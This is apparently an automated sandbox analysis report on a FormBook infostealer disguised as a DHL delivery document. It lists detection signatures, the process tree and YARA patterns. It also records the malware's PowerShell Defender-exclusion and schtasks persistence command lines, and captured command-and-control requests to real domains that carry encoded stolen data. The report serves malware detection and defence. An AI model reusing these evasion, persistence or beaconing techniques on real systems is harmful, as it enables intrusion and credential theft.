
Windows Analysis Report
DHL_Delivery Documents.exe

Overview

General Information

Sample name: DHL_Delivery Documents.exe
Analysis ID: 1446732
MD5: 9c930da2ac186c1f945a7bc74aa491ed
SHA1: 3b24459060ab8590b7c550d34bd0243cbade3e2a
SHA256: 25bbd4a45d4d02d8bacdf482696505ab302ad8591b5e06da57481f7098324f9e
Tags: DHL, exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DHL_Delivery Documents.exe (PID: 2656 cmdline: "C:\Users\user\Desktop\DHL_Delivery Documents.exe" MD5: 9C930DA2AC186C1F945A7BC74AA491ED)
    • powershell.exe (PID: 2108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7220 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4204 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DHL_Delivery Documents.exe (PID: 7184 cmdline: "C:\Users\user\Desktop\DHL_Delivery Documents.exe" MD5: 9C930DA2AC186C1F945A7BC74AA491ED)
      • OoIHIwIlaOHZFTFWeSHYCjEJ.exe (PID: 6460 cmdline: "C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setx.exe (PID: 7876 cmdline: "C:\Windows\SysWOW64\setx.exe" MD5: 5B700BC00E451033B2F9EEF349A91D1C)
          • OoIHIwIlaOHZFTFWeSHYCjEJ.exe (PID: 1352 cmdline: "C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8188 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • YybGLWQSx.exe (PID: 7204 cmdline: C:\Users\user\AppData\Roaming\YybGLWQSx.exe MD5: 9C930DA2AC186C1F945A7BC74AA491ED)
    • schtasks.exe (PID: 7360 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YybGLWQSx.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" MD5: 9C930DA2AC186C1F945A7BC74AA491ED)
  • cleanup
No configs have been found
Source / Rule / Description / Author / Strings
Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2e083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17682:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2abf0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source / Rule / Description / Author / Strings
Source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2d283:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16882:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
  • 0x2e083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17682:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ProcessId: 2108, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\YybGLWQSx.exe, ParentImage: C:\Users\user\AppData\Roaming\YybGLWQSx.exe, ParentProcessId: 7204, ParentProcessName: YybGLWQSx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp", ProcessId: 7360, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", ProcessId: 4204, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ProcessId: 2108, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL_Delivery Documents.exe", ParentImage: C:\Users\user\Desktop\DHL_Delivery Documents.exe, ParentProcessId: 2656, ParentProcessName: DHL_Delivery Documents.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp", ProcessId: 4204, ProcessName: schtasks.exe
Timestamp: 05/23/24-20:29:06.154524
SID: 2855465
Source Port: 49710
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe, ReversingLabs: Detection: 55%
Source: DHL_Delivery Documents.exe, ReversingLabs: Detection: 55%
Source: Yara match, File source: 8.2.DHL_Delivery Documents.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.DHL_Delivery Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.2632121823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.3279751855.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.3278511173.0000000000410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000013.00000002.3282139682.0000000004C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2632827623.0000000001690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000012.00000002.3279792541.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.2634283775.0000000001F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3279859572.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe, Joe Sandbox ML: detected
Source: DHL_Delivery Documents.exe, Joe Sandbox ML: detected
Source: DHL_Delivery Documents.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: DHL_Delivery Documents.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3278494163.000000000060E000.00000002.00000001.01000000.0000000A.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3278640060.000000000060E000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP, source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb, source: DHL_Delivery Documents.exe, DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: setx.pdbGCTL, source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: setx.pdb, source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: JeWB.pdbSHA256, source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
Source: Binary string: JeWB.pdb, source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
Source: C:\Windows\SysWOW64\setx.exe, Code function: 18_2_0042BF20 FindFirstFileW,FindNextFileW,FindClose, 18_2_0042BF20
Source: C:\Windows\SysWOW64\setx.exe, Code function: 4x nop then xor eax, eax, 18_2_00419720
Source: C:\Windows\SysWOW64\setx.exe, Code function: 4x nop then pop edi, 18_2_0041E19F

Networking

Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49710 -> 103.48.135.8:80
Source: Joe Sandbox View, IP Address: 172.67.214.17 172.67.214.17
Source: Joe Sandbox View, ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
  GET /ew0m/?Urf=R9oUCj0Kr0tjZSdhKcVG72tknPUSe2YfdfzFTAWqH1uH1Z8SvVf85mUnaA3f99ILEbWrEuJ+fmKqJVRYQbENh1wm0L+Vjxgcu0XuSfZ61wplFH4xX6XBL/wdg7Pf2vzXJQ==&pP=fPyhqn_HwdI HTTP/1.1
  Host: www.uzonedich.com
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, HTTP traffic detected:
  GET /0eyj/?Urf=xbMFueOYBXYurIwiepFnO71qLlyP3ujEHyf23sFAywtga3bqBhIKPev0K8adiimIvdV9j6fOUj2Pc2CkptCWxRwbiV0KWskIok5o/u5VAK+QdqKfe3RHCloueJvNBgPjzg==&pP=fPyhqn_HwdI HTTP/1.1
  Host: www.alexbruma.com
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Connection: close
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.bookingshop01.top
Source: global traffic, DNS traffic detected: DNS query: www.uzonedich.com
Source: global traffic, DNS traffic detected: DNS query: www.7egiy1.cfd
Source: global traffic, DNS traffic detected: DNS query: www.alexbruma.com
Source: global traffic, DNS traffic detected: DNS query: www.prospin.click
Source: unknown, HTTP traffic detected:
  POST /0eyj/ HTTP/1.1
  Host: www.alexbruma.com
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate, br
  Origin: http://www.alexbruma.com
  Referer: http://www.alexbruma.com/0eyj/
  Cache-Control: max-age=0
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 204
  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
  Data Raw: 55 72 66 3d 38 5a 6b 6c 74 72 53 34 42 45 45 4d 34 4c 59 49 55 62 6c 2b 4f 75 68 73 49 46 72 5a 6e 71 36 4b 41 32 48 55 36 72 35 44 2f 69 49 53 46 6d 58 69 49 31 77 36 4d 50 6a 6f 4d 4f 6e 68 7a 6b 75 61 67 61 30 37 72 71 65 52 55 6e 43 49 5a 58 2b 4c 30 2f 2b 77 78 31 63 45 69 31 4d 66 5a 72 52 55 34 77 70 51 71 64 52 63 58 71 6d 54 51 64 4b 62 43 6d 73 4f 50 48 6b 6c 66 63 33 6c 64 78 75 4f 6f 31 58 62 55 74 52 4a 42 65 76 31 2b 53 55 6b 4e 72 53 66 78 45 52 63 70 30 58 75 38 77 63 4f 55 42 46 4e 41 36 30 63 51 52 4f 53 4f 76 33 7a 31 37 56 4c 6a 63 75 4a 68 4f 6f 4e 52 59 4b 70 63 43 72 57 41 52 34 3d
  Data Ascii: Urf=8ZkltrS4BEEM4LYIUbl+OuhsIFrZnq6KA2HU6r5D/iISFmXiI1w6MPjoMOnhzkuaga07rqeRUnCIZX+L0/+wx1cEi1MfZrRU4wpQqdRcXqmTQdKbCmsOPHklfc3ldxuOo1XbUtRJBev1+SUkNrSfxERcp0Xu8wcOUBFNA60cQROSOv3z17VLjcuJhOoNRYKpcCrWAR4=
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Server: nginx
  Date: Thu, 23 May 2024 18:29:06 GMT
  Content-Type: text/html
  Content-Length: 548
  Connection: close
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 23 May 2024 18:29:30 GMT
  Content-Type: text/html; charset=iso-8859-1
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTDzKzRHGF6T7c3wPmmJUP2aLUqZYFsOZH7jrvhqEFg4rJXjwQjj0XGOOna9U8sTe6Jfo2gh2biqAlIveAApqbQ8W65HFqOR1o9%2BqFbFwKlsqfbziKo4ndIRZW%2BAJVQIb8%2B3hA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 88871ca27ba97cac-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  Data Raw: 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: adL=@D{~J/rs|DDbsky2/9:Y1KdxkpHW+HsC-0R3upQP/f=hYAu}zXx,8nFy~~b90
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 23 May 2024 18:29:33 GMT
  Content-Type: text/html; charset=iso-8859-1
  Transfer-Encoding: chunked
  Connection: close
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyCJTmDV9ptbaS1LmXnX3s2wST%2FMbCNKmJzEUCj3PwPKcLPZaBEUBJQ7wSP9BeU1CH%2Bvb%2BvjgLgkMolS3mre3FWg86VlHduzeGggAamCEeRTfjFc1Uuq5uE8gviAp2%2BYQDLwXA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 88871cb238350c8a-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  Data Raw: 62 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8e 3d 0f 82 40 10 44 7b 7e c5 4a 2f 0b 86 72 73 85 7c 44 12 44 62 8e c2 12 73 6b 0e 83 1c c2 a1 e1 df 1b a0 b1 9d 79 f3 32 b4 8b 2f 91 bc 95 09 9c e4 39 87 b2 3a e6 59 04 ee 1e 31 4b 64 8a 18 cb 78 6b 0e 9e 8f 98 14 ae 70 48 db 57 2b 48 73 ad 84 43 b6 b1 2d 8b d0 0f a1 30 16 52 33 75 8a 70 0b 1d c2 15 a2 bb 51 f3 b2 0b c4 1f a3 03 e1 50 2f a4 66 18 f8 3d f1 68 59 41 75 cd 01 7d 9e 9f 08 df 7a 84 ce 58 78 2c 38 98 0e ac 6e 46 18 79 f8 f0 e0 11 f6 8b 7e 15 13 ae 87 7e 00 00 00 ff ff e3 02 00 12 39 e5 cd cb 00 00 00 0d 0a 30 0d 0a 0d 0a
